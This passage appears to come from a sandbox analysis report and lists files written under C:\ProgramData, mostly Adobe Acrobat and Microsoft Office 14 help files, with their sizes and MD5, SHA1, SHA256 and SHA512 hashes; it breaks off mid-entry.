2.3MB

MD5
f00d26d63f30c5818722c399e78689e4

SHA1
d943a1b15d064d22ce5b6cf38a856fd9907ff0a3

SHA256
da30c3ffa88ecd8be7ac1947e1d416348de4b361cd6504ebcfb0509c0589ffee

SHA512
11989921fd95f40e97fa1751e41b318f679772d348a4068666cef02f85ca50bd48b97e0b86a4e6bbe683bfc487daa71e5a4d23d130d1db798e4aa6b7a8f5ebd5

Download Submit
C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata

Filesize
754B

MD5
4b8e7f6b499da79a067bac77d255987c

SHA1
9e8decc7d89a01b4218abe0ba77234e1ee986865

SHA256
d2fa72bd9d2b7aa5e50714b6a5a15f05f0fc05557cc4d883c8e9d02fe1cbb6b3

SHA512
1ef5df88ad2e222bb5c0f0acdba77049ae14fdf97ad9d8bdedc9c14d710a970a57dbb11110df6fa5b1f69def4e72435ecb467c93e3aec5791ce3c2431684446a

Download Submit
C:\ProgramData\Adobe\Updater6\AdobeESDGlobalApps.xml

Filesize
562B

MD5
799db34d2ec500f787311846f8598b10

SHA1
cc15b673edeb4dc3301bb6e4d90baf691c047003

SHA256
de21d785789e91cdb867002b7eb3d35c069f79ce5b3195121ff0b0efb57b290e

SHA512
fab7359f4a1bd1091fefc71a02d1217dbb5154ab0d2f07a5648c2a9d56c9697f218dc938346632bfb75b31cf67b92f503c6ec8bc15170ae7c2d7302db3ba1638

Download Submit
C:\ProgramData\Microsoft Help\Hx.hxn

Filesize
674B

MD5
5e167c37be40e4dc7b8b00855caf4171

SHA1
fa5890052f1372688d68df4531818a05ffa7a06e

SHA256
6c7d06619e5284715391d903d425abf8857e8a3ca4ef9ead06aa2bf07a52221a

SHA512
687e03e5b873e195e86112658f4f67168502160526bd767ff7b28caf8fd49335535dd49f336ac527b80d9edaa0f05eb8db7d52de5b2d9ef830b17da84c8d418c

Download Submit
C:\ProgramData\Microsoft Help\Hx_1033_MKWD_K.HxW

Filesize
13KB

MD5
59cb8e555237edf39702e3b7bb9a8d27

SHA1
91c0586c71c2148c48f8eec8fd1a7beee059d5f8

SHA256
68f65233a71b3c5c996e1aaced3de1a28d2ca3f13bdc7e870a356e279d12eb4f

SHA512
5798d450edc26093bbe7d62ab60465bc27b0277dd0b3b935c8a6dee4aa0024788579a64488929a13d743b0db34d2381bde11c840c0083490115bb8a98585feb5

Download Submit
C:\ProgramData\Microsoft Help\Hx_1033_MKWD_NamedURL.HxW

Filesize
13KB

MD5
653caf55d6f044aa6aff6d4a02f72f6e

SHA1
18646ec69129397853ace1ddffb26cb521175947

SHA256
2a44d38ef60c2e8ad7f9d6f4e1e5e888c468b455478b374d88e9185818fa7931

SHA512
d07b96c7010b2494233df971e6446ba9ebc4926ff1ff9596fc6a594ea5f6236650f7cbafa1bf16e3881fa858029db45478c894c61b5ce154ef5ea6c6c81118b3

Download Submit
C:\ProgramData\Microsoft Help\Hx_1033_MTOC_Hx.HxH

Filesize
10KB

MD5
efd66ab164db8a7796641bb32cb3dbcb

SHA1
5c73118c6924a2fa9ea378a4acf76caccbdea453

SHA256
e12bed6413aabe098795ff3c8477630972c68b4c1b8c1eb623001898038b1ba1

SHA512
a238453fec7babd892c5c3e289dba18f2a221caeba6799f79151258d86b2985881235dd5bddaa7f26b64a552d90abc484757ef41cee59ceca36504cc6114ad50

Download Submit
C:\ProgramData\Microsoft Help\Hx_1033_MValidator.HxD

Filesize
9KB

MD5
2de6acbc2974d3275afed7a6d2a7e98d

SHA1
700d4803e238ce9bbf71746a54524c212f9f622c

SHA256
8631bef5566c6e2f18376a6b71c22ed02db0366f18d32960bd5d39a350ef87b2

SHA512
5784a5f52d9c860a4befcbc39bdcca146c4f236a3aad53f634eef3b3015d553e9e909d5973bd069a0dc8a0014925492c0935942ca7cce8177cc748daa7e03ac3

Download Submit
C:\ProgramData\Microsoft Help\MS.EXCEL.14.1033.hxn

Filesize
626B

MD5
7a33aa1f508a98cf79d8982a69cd4284

SHA1
953a1ede2e52fb9e6b3310d01e9828d203df1bc7

SHA256
74ab3125ead2f5fa8637ce10f5df1fb413dfb24b0e7d2e5c52f0c372157cd53b

SHA512
6003198b98a28497a9e8d4ae14298b5768f1b8da7bec8f91fd81e8b982a10d1019135f098215746f97a460d824d57828899897bf58e03c1016cee33211ec24a1

Download Submit
C:\ProgramData\Microsoft Help\MS.EXCEL.DEV.14.1033.hxn

Filesize
658B

MD5
9351c17866fe39adcb397d2595140e6f

SHA1
109cc395700202a43cdbc11fb8693bef72806602

SHA256
5a5020ea362eee18dc3f2517a8fd7ea5f4559cb6fd997b1cd2a67c73d1f132d6

SHA512
aa6e7a97841717836bd778110dba489f517957cbdcee6b03dc077b4555143be8c4f28cc005be7c08ffdf9451c1bb1d53b3fb32e7619350670d08b9389ebdf454

Download Submit
C:\ProgramData\Microsoft Help\MS.GRAPH.14.1033.hxn

Filesize
626B

MD5
2043a3f5b37cdbd91df99b2c64d8e3e8

SHA1
8d62360de480292fef73ee915b548271085e9b66

SHA256
ddb4ac6a59cfc85e89fbbc8a9ae3241503ab7f37cd39c5b79c522d1a388e40c9

SHA512
cc261f39e2425e74f39df2e116e1a94f8eb105d4202a4d922fda30fb9c889eb2410b200f1ba8e0b21b441c752d9fc4bdad3ea0cebd091f4cef9ba3018cd4a621

Download Submit
C:\ProgramData\Microsoft Help\MS.GROOVE.14.1033.hxn

Filesize
642B

MD5
063fc5a00aab11f052e3a271653b513f

SHA1
234172007115efb94004a90f2e9f6a0076f9db09

SHA256
0c7a3d3f7c801b6a337636fe9572f44866b27900f2d1745dba3d82bcf70a908b

SHA512
af1ee7cddb84c6f531ce1c1eb64c4bdd196ae969348b9676e4de5374aba735b1ffb559106b69e48b463d4c3e7d190932ad58eb7beb6f428401e49dd37fb0d3fe

Download Submit
C:\ProgramData\Microsoft Help\MS.INFOPATH.14.1033.hxn

Filesize
658B

MD5
2cc2c1bb7d9e2986883b401be40a79a3

SHA1
f09a50548fe1501b22c6b2f2a970017698f7d5c6

SHA256
6f66e2091fb38f5e1fbb2f439471f7a1cf628f8f06e41e7ed3604d726c0231d4

SHA512
30f28eaafbb2a3926a45289b6d6c6f923a1b2e6326d9ef18b90a9bbae7d6dc1d68c8e58e9c66d2c5311ac6b2ae3f3c225b4c87130a510766df8b4c162db67924

Download Submit
C:\ProgramData\Microsoft Help\MS.INFOPATHEDITOR.14.1033.hxn

Filesize
690B

MD5
31ace9ddf0c545a3cd32def7c84d8123

SHA1
360c5244c9d5dc22cf321ad14d5e64389ffac20e

SHA256
27477550449700edfeba7a786c84107c36e195ec3827c4f67875f96036e06f4a

SHA512
17816837568c4fbe0c2906ad6386f86aa04eb1a3725009477218654ab95b987c7738428aad2a76c632902ee598022bcb32537db8e0daa56ada48251dbd404237

Download Submit
C:\ProgramData\Microsoft Help\MS.MSACCESS.14.1033.hxn

Filesize
658B

MD5
da731505e31b326361e12d278d28b266

SHA1
c5183254d4923c7487ad1e7de9d10f3fa7b93043

SHA256
592a78e98aca3863b9b399fe7e4b97ebf3a625439b6d87c73b99e9305990dd27

SHA512
2f5dc692ebba193719add444eddf4fc1b5c37abd0bbf8ecc3b499d4dd975a905c4ae5dc29662fea771ffe8eb5c518b3fb30788ea1dce58419c4f23af3c290980

Download Submit
C:\ProgramData\Microsoft Help\MS.MSACCESS.DEV.14.1033.hxn

Filesize
674B

MD5
985be4e9eafa797524e1f06b9c283f49

SHA1
825f644d53f91f81b795ba4279d96f2987b105a4

SHA256
504b5f4040345352df583929dcdc4d6624d6f8df5297384fdd879ee7294a1e0c

SHA512
140e444b29c70d31a455462ce81b763848456d7249af11d52071420b8c59a1c0b1119e884a56ddb3ec551f6be51bbc6569d0091584c5fc94a6dddeae4f4790e2

Download Submit
C:\ProgramData\Microsoft Help\MS.MSOUC.14.1033.hxn

Filesize
626B

MD5
45fe47aa600fbf00ae846d6a2a97324c

SHA1
98f001c18dc3d1f8688a3c740dcd7afb0dab012f

SHA256
ef473d3d553406ef56fc889e3ec4781c140618738b68a524432d7ab05f10aab0

SHA512
b2d82d92523ae2c4d2b0f9ec40d34a42b26af5d407a9bef13ae65c2671b4f8ed0c2d8446d3cfcbac2530f2c063238d53e29bf14e5b5efe4d0ef31b7860e49adf

Download Submit
C:\ProgramData\Microsoft Help\MS.MSPUB.14.1033.hxn

Filesize
626B

MD5
229bc6ab5db6fc39b675925fda33df79

SHA1
199a049e4bce24ab71d0a34372f0c66a5bdc9dba

SHA256
2a5ebd1a75801444e559e7185055af21dc833ad940d5f3a9cd7e434dc2b10dc7

SHA512
87f268f7e852187fd2f0073e46276fb33359d82326fa9d298307fd158928bb831d2be06de31338eaf6ef0c09a7494eaa25b81166d46aeac3cfeceeccfd0a63f3

Download Submit
C:\ProgramData\Microsoft Help\MS.MSPUB.DEV.14.1033.hxn

Filesize
658B

MD5
0f51a498df3ede2e5067157e3b75c32a

SHA1
5691c38cc4e2f476b2d3c2254493ce9f2d900991

SHA256
305ad551fefd881b7e829332dd493b121d5c9e811c2cbf69d37580ae630dd247

SHA512
ad51c0e514edbfec30de7782c29988808975b44b8557d3448cc9f839ea223c590187fb0a5c94fb1df0cfa74d45ceb6deed5b78dec8cf93399f3ba3bd898239a6

Download Submit
C:\ProgramData\Microsoft Help\MS.MSTORE.14.1033.hxn

Filesize
642B

MD5
7a4e2d09062e9aad306827b732fb5de7

SHA1
1555a6bf753819bf2e8eea52db65a3b0026f8ee5

SHA256
5b5211c0b60921319a285c3ced04c5f7476c3e07899e09119cc7086b906edd14

SHA512
8240262a569bc9f869f76b99f4bf61ac6f6733e41fb322072b414b233eb3829a21a2d65da28d3a2793466534a5c8b0102b6ae2c4feef6031d7d6f23d142b9ce0

Download Submit
C:\ProgramData\Microsoft Help\MS.OIS.14.1033.hxn

Filesize
626B

MD5
7afcbcf7f11a71a2c91f71c91e06aea3

SHA1
90bfcaa796c033784bab5fa8b40476fcb461507f

SHA256
e84c201bba9f2d5965860338f386b1d5c100bd77a06d24f7bc2fa0401e62effe

SHA512
3aa74272da87a660e13affe3c2c1f555732faf59543af2296abee1bf7f9f3c7af3817cfb8b30e35434c99d007cd9caa9bcd96cac983f12e3064bae6fe8922df0

Download Submit
C:\ProgramData\Microsoft Help\MS.ONENOTE.14.1033.hxn

Filesize
642B

MD5
aa4c7d95db4f0488bc13af90251bd93c

SHA1
6923dae3a7595d014c778ba44e5480b7fc0ec912

SHA256
12c0eb200e6a868700e835133172643bcc95ca42e6ab4d3a875a75a26e80c010

SHA512
51d2ef5d2e601853934beb70dde275f7a02bd48eaf932afb1e25445c9cccefa6c838ec96666e33d50a7b5031f55c68def58d9913551d672b7451911c6b3f67f3

Download Submit
C:\ProgramData\Microsoft Help\MS.OUTLOOK.14.1033.hxn

Filesize
642B

MD5
9e8bd9e53cf3b32846c784baf52c1b89

SHA1
e4a5c88a9fa607494a898a0bc2bc1d1dcb124d1c

SHA256
e53308eeb3fb7d6e57a4087a5ed15b98e1bd90c08931d25129cbe8327774f654

SHA512
6ece5b8fda0ee91e834dd189fa4a998cfda4439bd56e8270c440da2a940e8f699597cb78d8d9fc6d427a5dc8ce8a69e600db434f8326407756dcd97fdb83b818

Download Submit
C:\ProgramData\Microsoft Help\MS.OUTLOOK.DEV.14.1033.hxn

Filesize
674B

MD5
dd6971437c3f29354c952461ee09058b

SHA1
1c77b8883b5f310fc9e8166284e2f21f05497799

SHA256
0013ddd0d1866190212f07cbe6dc04ed26274d062393fdd37870ac499a218020

SHA512
d61bebeb8214c862ba9d32e2c987703b276e50e9d288fd5a5ea7474cf65b464b492a0def8aeb91b5592c2cc7f7accddfce4dd1486c9c7c46be11485d80a6c84f

Download Submit
C:\ProgramData\Microsoft Help\MS.POWERPNT.14.1033.hxn

Filesize
658B

MD5
0ad00e9c17c9ce31c07803771e368cf2

SHA1
cfeee8958adfe1266f34757e22ebdb091dff00f3

SHA256
565fac3cdd64def8c3a6fc657a35966996b63b58075679bd56378363b942e6e6

SHA512
0dbcbd1406a26ef5a766e1c4d6b5730c2a129a609a069fee5052886439643fea6cd2e749ecec9db3f177dfbce42ddaf41fced6474ec738f7c72f2608a586709d

Download Submit
C:\ProgramData\Microsoft Help\MS.POWERPNT.DEV.14.1033.hxn

Filesize
674B

MD5
68ae43f9747c7adaff0c3900142d6b5c

SHA1
ad51b02c6945869700a5960bd062c4d30d5d11c1

SHA256
de452ad5f57469bf9e45eae4c4e44fa27aab3d04a4e5fb616076f07a028e2054

SHA512
90c7d18922a3bfe2a22384ccd1a0289475919e1ff5be682927e5aef1c4673b0653dd50246ffb07c685851f01b666cd04bec66d9788490ca6e92b4092677bcd4a

Download Submit
C:\ProgramData\Microsoft Help\MS.SETLANG.14.1033.hxn

Filesize
642B

MD5
6aac5ac96544734b3521ff9c1f700c90

SHA1
89d4729ccc93cfab88cf9ac37fd54d5bd5c58c25

SHA256
08f30eda8485f226b41642e06cf71c1ddf1015297f8d5879ac5349565e9f8f2c

SHA512
4494d22e608ec233dbda907649c2cc803b1c0566fb22f6f1fad5a1909c9107906ce64ea3479fb43cbc5dc297daf4cd99d755195216d50960fe9274b79a5e449d

Download Submit
C:\ProgramData\Microsoft Help\MS.WINWORD.14.1033.hxn

Filesize
642B

MD5
a201267fa519a0c770490c7349759de9

SHA1
f5be03d4daecdfb539c19e7f38c74e6e24c9cf71

SHA256
8ea0998998e21c43c7dc115cdd108de05af1b1ad49dc7687a8b3585c02435b22

SHA512
40844e694a13492352079a62d8da8f5b948318fc4f609834cd48f84dd15cf1a1569843446f78a219f4d15390bf2ea0e17167324875ffd2a180447e7bb19f950e

Download Submit
C:\ProgramData\Microsoft Help\MS.WINWORD.DEV.14.1033.hxn

Filesize
674B

MD5
24ab96615085a36fa3d5e3e370893d6f

SHA1
ba05755f100bf69787327d204e741d7725698b40

SHA256
3f27357648da87318ec94b308f51602d91abc93bce03a51158d7582ee4da0fe1

SHA512
9db14448f7709ce06f1a07a4cd66323b01cabc4f8e5ac2e09d453d35e33c4323fb5c5fcab526c353298c70de91eca7641b32afa1012852c413a0c82a63269f03

Download Submit
C:\ProgramData\Microsoft Help\nslist.hxl

Filesize
6KB

MD5
95b18bc7490bff4e0ba6718722b6d88f

SHA1
9204ead4209e288a8521ebc5cc6ad2c03ff32423

SHA256
8a4471b4a503cd12d9cbcd19eb7d0df591c3fc16fa6249a0cbd7592e3ec0bf40

SHA512
81f157ee9aa81e444e2dbf1a25e53ed86610b00c99684971f5729183fbffd30fbb33539e62b8f091bf578cd41938d56521005ca417833a41b17fac14260a40ba

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\de-DE\Help_CValidator.H1D

Filesize
12KB

MD5
e137d1a1bf163e045b0213cc9f4c7a0a

SHA1
f065b2ea5115d1afcf3970a37023713935ef0db8

SHA256
d3c9965b61c4811e836b6f9bfa0c23a8bc2be6521c3b6f9fbbd7611e129b7df8

SHA512
f8abc61e118546fd155c3bef9fdd4038303b4d92a3a2e2ab516bb5244a16959714b99762874fda5bcd60bbb5bf6627a711e3af967b51b9e657c2be0c1d10f8db

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\de-DE\Help_MKWD_AssetId.H1W

Filesize
229KB

MD5
d8068586ba5142f6415936258c63c230

SHA1
25986dadbea37af815e836ebaf7bede1182f56db

SHA256
729a5b612c2470f90d1cea548789e0eadfe2eb6ab8fd4a71e5249951ae26a356

SHA512
ae30d500dd94cc2058a328da19100513c4c700998b59d9a5a82ed4ce7b97e653b923fac04853a7a719ff13101cbb84939b89665bcb394bde983830fea533608c

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\de-DE\Help_MKWD_BestBet.H1W

Filesize
409KB

MD5
272c5e21bf3f06aa74b57f41fa382c56

SHA1
59301ba7c2c5f6d190bd552098b4c4adcf58f858

SHA256
24f39632452d6e6a295b5bf5f3db9b2e0cc4f83d75a685290d27df27fa2a82e8

SHA512
6755fe1d986cd44b8a2f052a3c80d98a322dd25c3e54935c4e9b3d22bf2d4d7ac063153e3fe481000e1c52f25067550109e2784b35b15dbc67fff94d95edf0e6

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\de-DE\Help_MTOC_help.H1H

Filesize
531KB

MD5
a9267a485eb919a8d5f0ddba61a9e899

SHA1
caa18ec9f3aa201b7e13c5203323515636fb2124

SHA256
c54d883d6e1dd174e13ade60958147d43731677d7bada115f8c2588efda749b7

SHA512
a5df1314e14b19667f07cf7bc3b57916534597fe6bb6e26138af78f1efb5109c7771d55302da78225418345679f38b03bbee8bb0d9203a973e76b9cd3448a08d

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\de-DE\Help_MValidator.H1D

Filesize
14KB

MD5
72bc611a31347315c374cf5f85d8ec28

SHA1
5e6074cf465ca8b869d2def73f79eeec0bff17d4

SHA256
fdd53ba73c91a32223f1226d21b3e36cc0ea1b07cb2afd5a7d218dc385830437

SHA512
d61bcd5873ffdd0ed62767fa35df6ab420a46216f246d41f3707ad81ddfd520890643270ecd0bbc18b06b7ea1a4e8735166f48f86e76477ed1b11f7b8284c1f2

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\de-DE\Help{45EACA36-DBE9-4E4A-A26D-5C201902346D}.H1Q

Filesize
1.2MB

MD5
bda8a70cad57801f2158e96c44764171

SHA1
2bf200444806b9b748d8d6aa3a0ed07cfa93c1b9

SHA256
e8409d5b51110b1e9876c950f738d4b7561df5c5fa340294a1e7ddb24a3dfa56

SHA512
b7056407c24b87f5e6c94f29fba4eb790f47c8f4960ab00d8bcaf3bc21ccb1156d8b41da14695ad5fd4e8d5b6cb4f9a47e073eb0773dbc545cf0196442711bb6

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\en-US\Help_CValidator.H1D

Filesize
12KB

MD5
f2cb408e199012815296a8c287b8c1b2

SHA1
0632f3617a47ec5ed7ee53a7673df1e9a06496eb

SHA256
1024279f81d9e5292314412cddacaccfe786bb6ad7be24f990aae382f295ab51

SHA512
b0d69ec04705592a07030383357b5e376853dc1afc9e238346b6447cab27b4f2e59ab984cff0e629f3fc059da1a1e14d4765252829b9da45b3310d1273c38a9b

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\en-US\Help_MKWD_AssetId.H1W

Filesize
229KB

MD5
0f878b8bd028231003875e463121373e

SHA1
5200b7aa9a6681fea5115ef43f04cadf3275ea71

SHA256
6a710ce220007d1f372d3d263975028b7f740e4a10d250878045d5408d9e88e0

SHA512
97815c839b2a76638243462c39845fc4d8c1a82b0e5f415692573e6477491b0e1af8ece2a66645e44b05777ecd692587e41f459bdd6c5388c4de92dcd405ca3a

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\en-US\Help_MKWD_BestBet.H1W

Filesize
201KB

MD5
c72cd6597a7e03747fa844815e26561a

SHA1
d9e2c7df9ce2df8c4a3d395bff522537c08c9b77

SHA256
818871137034ce8f6a4371810ede3ec89a9cfe69e9544dbfa11f57eed34219aa

SHA512
8c19e9b312a66462cf23fe78c702ae075b80aea8b7608cc5360158d8c2ff48a75e49a965e73058679a980e81d3678df292c7086ab08706c6f015dd4afb9d23ed

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\en-US\Help_MTOC_help.H1H

Filesize
491KB

MD5
41d5ac814c491b81014183f6ba4aeb34

SHA1
cfbcbe7c821edf2830dc069f7f72f3382b0e7d20

SHA256
e53731f9b5b4dd61c169a2cd353a44f9d440637da616db2410d2879c371936eb

SHA512
d13b5a6dc0c51be1c565c29d489d8e4a93329e44b08dec8ba20ab9f249ed373d4ee4f503bf727b9b41af835638a0ad97311c2ad0586206a6afe8051414118a68

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\en-US\Help_MValidator.H1D

Filesize
14KB

MD5
cc20399d16f1f10c321384765bb267f3

SHA1
83768ccf25311a1ac3b88c278e75833f006cd32b

SHA256
0d332073e4455afafd074a1a4f5456a7d712e772f37930e46edd73f68e81d2e5

SHA512
befc89f77f1ed091a7cb0b6359bfe89cfe23cd2197d962cf418619b4242b82b1fd15668049d1b8dd2fd242fb210fa1b602a9d8b1171a79d4e2c6b93b24228e79

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\en-US\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q

Filesize
864KB

MD5
c33eacd21ef3f22f2d30edb7e19652aa

SHA1
74ac2e268216bd6723afd3ea70def192aa18483e

SHA256
c18e3e4a2ebf8118ee3320fe96f9521a80aa4c3cdcfd13b34d7a8c91ef31de7e

SHA512
013e6fd10f14ea738f8d21911b72bd4e6520043061e00b30254f5d095dafb11834f5097812eb02c331f1c7e7c7f04c0ae1a160f40e8819299a6a1a2828993b31

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help_CValidator.H1D

Filesize
12KB

MD5
dd559fc4d5a802fcfe3b375c27814ebe

SHA1
b52c5cc2846cfab5668b24801c645fc06ac220eb

SHA256
d54c01e6964c9ba00f14d441cfa474b369ddd7d225846aa6f4d96f30b8c0304d

SHA512
9536de051ef8bc6d5f055a2a1efe33395eff76d5dacf8c95c0ef6192cbf95fe58239258b3d5c04041719af749d1b23dac154e8114c1e1f7fbedf079290f66887

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help_MKWD_AssetId.H1W

Filesize
229KB

MD5
1c3035017250b268abf95a8fd32671f0

SHA1
1a8337493f231edb7b3d07b41453d20ff7a22cd4

SHA256
d8c7cfbb092fe96a75b6cd0e94f8193e595d457949ab92fbb132d64e95da71c0

SHA512
8f5d6ed3200b5bd65f78d5aa4ae0cb909c4ff54ec2d7d5fa41258459052e0aef88c5821f783cb6ad594a2018efc5fd3ae9909fa455cc3bdef9ceaa5197ac79e3

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help_MKWD_BestBet.H1W

Filesize
425KB

MD5
7f46299d960bc1e84287b1f786ec46cb

SHA1
045798a75ef73fcbb55bf906272c1dd148149138

SHA256
80f8fc647fccdd4d554c46f41fbb9605119cd7df006d8531f65be786403d450b

SHA512
47ed43c30259656141b48ad049ba0f02a8a860433d8d30cc1d0c55bbf03c9535ba33b0b8d5fcf4dc655e40342b89502a26667f3cf873a3982d2912eac418ace9

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help_MTOC_help.H1H

Filesize
531KB

MD5
eb6022df59609a7540cb96419a87a6e3

SHA1
3c60dd478b52c6bb535333dc185cf5013100c2eb

SHA256
706ac83b0718b2118af33220690e54b4960f4b252eee60f5eab3b17d12bf0570

SHA512
40600d3eba57ddf4aab1e8bbf39585986f15923e443db911342a2a26139be93301d84a0d32d76d54b886bee4ca6e446eb856d80a94071ebf5b05e723699638a7

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help_MValidator.H1D

Filesize
14KB

MD5
f880d8ca04583a7533831222c7e1ed8c

SHA1
afba0c93d8489b44d164488b87311fe200f264e4

SHA256
942c7373cedba7c3dc5c9fc6158461500aeca9e4cd3bcaeef72af849e5dcb302

SHA512
2bae1216a2eb70d40f8c3d3815bfc9b822d59c85e5eb09ee2117ab33fee1fe9accd49e1136c876fc176ef0edc28030fd22600fa04d0e1d8be343cdea76c268e3

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help{68DC71DC-2327-4040-8F03-50D6A9805049}.H1Q

Filesize
1.0MB

MD5
46df14b0bfe1dbb8f3acf02c49d27108

SHA1
e947b2bf2b45eadb0d18108fe3ac3ed215387961

SHA256
93ba45b7712e2892102500fa44d9cb6fbd32eb547d6f8b53bfb9044fe7276d6f

SHA512
dee8352c34bbc1234a2fabd97c063c48afb72fef6e3d4b2a6fb86b0409f6ef8c93ff3114db8ee455884493f230f940876fccb7a76b580932c6bbee18bfa9927e

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\fr-FR\Help_CValidator.H1D

Filesize
12KB

MD5
c5f1cb82cc9ee227f8d6854ea2e7a3df

SHA1
732e144f9a9a6150df805ff9ad57aa7d67c16c26

SHA256
35aecb62a69732af704a2cde6ed4ec5dd9f82cc42b7432931bc87bc5416ccd00

SHA512
c4e34889fd931f213f27257a69c35f9ac34b8597b3ed314515c3346ef426a24bc50ddf938feb795d2400d85178ed8cfc250120cbb24fe1b6a316122e18bf0ef2

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\fr-FR\Help_MKWD_AssetId.H1W

Filesize
229KB

MD5
5458c5e94d30b911869b647f44285221

SHA1
0d798c1e77625c761200912230535e8c99874ebb

SHA256
bb258680d383d808a43b4f3bbfdd3e52a01a2013accc041a053ce61b0e1b6637

SHA512
09b5f074f18d08e979178cb73b1e3fbdf64924de8425e91f79627e3eecf8259942062bea2a47511e6edb5e4d3d4db6508a0b7a1c6e049a2a555f0150eae59aed

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\fr-FR\Help_MKWD_BestBet.H1W

Filesize
421KB

MD5
a9fc82d732fa026d99dc1665c5bec80e

SHA1
a872a166521e09868a53d6fc507d65df0ef2479c

SHA256
f9b8844a494f4248fbad8b0bea41b41d65809098b146289d389a0b9e836881d2

SHA512
11132c42f33d9321536c0fa59253f13def3c37de166cfca36ae531f1b9ddf497a24e91271a2ac942bef55c0249950ace2b6432f5915aa3653ad580c9bafb79cd

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\fr-FR\Help_MTOC_help.H1H

Filesize
546KB

MD5
e632d6d44ff15f27c8bd5ce0fab17d10

SHA1
550cc23cd15ef71e8135d71191b51748241bb2b9

SHA256
9a92cddb88b646ae9bc433da6346d88f0cdc34205139874e6e429141e6c066be

SHA512
8da493bb39428395aa3dc0dab2ec0190897a29b0d16bdb3468c65e70d12efb6c7a1932dc84007f87fb48ae08beab94fe659cae44f9b1b38e8d23cb94d9390176

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\fr-FR\Help_MValidator.H1D

Filesize
14KB

MD5
3fd089980b99efebdc0ee2262540f918

SHA1
e6d75a2737ef114508c6b03f1400717c48381bd0

SHA256
beb9985732cc2d5215e3f9ae86172a8714e1ead1f9b9879a55fcc83b5c63f5c7

SHA512
16193081b2f5d976ab118b82e3ec914177ee9be09c6a4cc2d2e703a330a9c4398b4189b53208613d0f3c6910a5a6c7fd82bd6c89ac3f431e5362b0a4cfe535cf

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\fr-FR\Help{92F2118A-E813-4A4D-9DE2-F96A9DC02C53}.H1Q

Filesize
1.1MB

MD5
82c981db490d15e9b22df46319d74b62

SHA1
11c2c16de565724f3fed36a5eb955b68443a0123

SHA256
e7624ef9a324fca57593c91ebf4a1ece9ae74e196d5c42866e76a9a8ea02c18e

SHA512
6da3a81ad27219696b922c151b984b5ffdbc042e404c705530ca0d56398bef8e7f447803d3a535b950cb01585c713906046a81e7bc2371ce95ce683c06f36873

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\it-IT\Help_CValidator.H1D

Filesize
12KB

MD5
0b2611da97419948e000b3f79ec7b100

SHA1
8bf9adb1ce24eda7c28b7dd642da9166a90ba7e1

SHA256
52076cab0cfc42cf9d08ddccc15d192955d59b5f6969ec324ccb706405fc66e4

SHA512
01ab9a1f6e50a2a37009e2b37f52bcb561b3af7d6666d488145c03a9f437b8e6688f95684a77d21b883b833d654a171394718c09848a49b436e5532b8e9aa376

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\it-IT\Help_MKWD_AssetId.H1W

Filesize
229KB

MD5
6a25012038a352b78d0ef82190989dc3

SHA1
6ebac29e09e7ad51fe06b0b3a41b4bb59a9e84f2

SHA256
2162e57e7be185d86cd8a5c39fc48e52ab51959af66e3783860fff2e8814710d

SHA512
a462013efc7f78751b96ada0b71e22d02f5f1332536280983efff9e5edfe3bb8471aa4f36d4a0575a4a1006d3f4468f7a21ba90a0cfc05bd7bce2c6da9318c04

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\it-IT\Help_MKWD_BestBet.H1W

Filesize
421KB

MD5
f03ec382f14d91408a04981d4af4b4ca

SHA1
928b07c34699cbe623731b4eeb7b1819dc5d7473

SHA256
72ca238821ae46d4bad4ec613a117139096a04df0d4e13dcd52378cb2e316917

SHA512
ae6c33ecd4e1b8ce558d6dacfca2abc496c9520b4e80039e1d1de6d0c27df18864d1a7edde9b2938346a2ef5fe06e081e9e86e4919e6728a209d18a22c250918

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\it-IT\Help_MTOC_help.H1H

Filesize
530KB

MD5
ac8578f13449a375f4a21a06c7dc04cc

SHA1
e97e08f1851ead9570073b632692cc4afd56ef59

SHA256
bfe10a5966398f854420a6c32bdbfbb98e45b557bb103af3e4f7441eb142d21a

SHA512
5e9c812fff7a7cd683091b29c786a52df66b2b3cf34de11de587edcedff2a38fec2dcb4a4759dc02c8ea913f83576cd4fe529338c872c070c07f3fda350bdab6

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\it-IT\Help_MValidator.H1D

Filesize
14KB

MD5
5d797b8267ca4738f2812b5afc9d8c50

SHA1
7e89a168cf31c0cb471799738d461ce12d9b37d1

SHA256
7413ae0cba3446c394078f49b72be889809013db23086832814d18af9c60cdd1

SHA512
ccdb00d1a1f87810c0443d4508d42d154495d25b12a49089c744fbb2ba328e9fab9903eea93c9d70f05d867549eaed04ffd09190519774966014b40ae6b6d234

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\it-IT\Help{7E352021-69D6-4553-86AC-430B0D8FF913}.H1Q

Filesize
1.0MB

MD5
3dee9dec30c328bbbeb512b28df4c5b1

SHA1
